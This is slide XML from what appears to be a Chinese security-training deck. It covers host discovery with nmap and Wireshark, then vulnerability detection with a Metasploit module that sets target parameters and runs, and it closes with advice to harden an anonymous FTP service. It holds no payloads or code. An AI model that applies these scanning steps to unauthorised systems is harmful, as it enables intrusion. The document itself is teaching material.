              <a:off x="7293331" y="2086296"/>
              <a:ext cx="4959350" cy="2999740"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>在未知目标主机的网络位置时，可以使用信息搜集工具nmap，利用工具中的参数发送ARP、TCP、UDP、ICMP、SCTP、IP等协议进行主机发现扫描获得主机的存活情况，并使用Wireshark工具抓取数据包进行分析，得到目标主机的网络位置，方便下一步对目标服务器的详细检测。</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="1097280" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr dirty="0">
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>信息搜集</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3795395" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3795395" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3129915" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具对Linux主机进行漏洞检测</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="文本框 135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5097145" y="467043"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>6.设置好RHOSTS、USERNAME、PASSWORD等参数，如图2-4-47所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5097145" y="1112203"/>
            <a:ext cx="5257800" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="文本框 136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5097145" y="2331403"/>
            <a:ext cx="5080000" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-47 设置RHOSTS参数7.使用“run”或者“exploit”命令运行模块进行扫描，如图2-4-48所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5097145" y="3807778"/>
            <a:ext cx="5276850" cy="1038225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="文本框 137"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3705860" y="4846320"/>
            <a:ext cx="7322185" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-48 运行模块         根据扫描结果可以看到，目标主机的FTP服务允许匿名访问(anonymous)，这是很危险的，这可能会引发黑客恶意上传木马等后门程序，从而导致目标主机被控制或数据丢失等，因此需及时修改目标主机FTP服务的配置文件进行加固。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
